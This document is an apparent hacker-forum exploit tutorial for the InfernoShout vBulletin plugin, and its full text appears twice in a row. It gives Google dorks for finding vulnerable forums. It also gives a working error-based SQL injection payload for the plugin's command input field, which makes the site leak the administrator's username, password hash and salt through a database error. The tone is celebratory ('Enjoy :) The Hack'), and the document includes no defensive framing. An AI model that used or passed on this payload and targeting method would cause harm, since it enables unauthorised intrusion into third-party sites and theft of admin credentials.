[#] Author : Hitcher [0XF0XF]
STEP 1)- FINDING THE Vulnerable Forums Using Google DORKS.
Go to Google.com and TYPE :
INURL: infernoshout.php
OR inurl: infernoshout.php?do=options&area=commands
STEP 2)- FINDING THE SITE (Check the PICS)
STEP 3)- Goo Here Exploit link: http://site.com/infernoshout.php?do=options&area=commands
STEP 4)- INPUTTING THE CODE :
Go to the Commands Area where it says command Input and command output in the first Link
pass these commands :
COMMAND INPUT :
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
COMMAND OUTPUT :type anything there It doesnt really matter .
and Hit save setting.
STEP 5)- DATABASE ERROR :When you hit Save it will generate a DATABASE error and Press Control+ U you will get the source
STEP 6)- VIEW SOURCE: press clt+u and scroll down the end of the page you will get the admin details
such as USERNAME:HASH:SALT
Demo:
Enjoy :) The Hack
STEP 1)- FINDING THE Vulnerable Forums Using Google DORKS.
Go to Google.com and TYPE :
INURL: infernoshout.php
OR inurl: infernoshout.php?do=options&area=commands
STEP 2)- FINDING THE SITE (Check the PICS)
STEP 3)- Goo Here Exploit link: http://site.com/infernoshout.php?do=options&area=commands
STEP 4)- INPUTTING THE CODE :
Go to the Commands Area where it says command Input and command output in the first Link
pass these commands :
COMMAND INPUT :
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
COMMAND OUTPUT :type anything there It doesnt really matter .
and Hit save setting.
STEP 5)- DATABASE ERROR :When you hit Save it will generate a DATABASE error and Press Control+ U you will get the source
STEP 6)- VIEW SOURCE: press clt+u and scroll down the end of the page you will get the admin details
such as USERNAME:HASH:SALT
Demo:
Enjoy :) The Hack
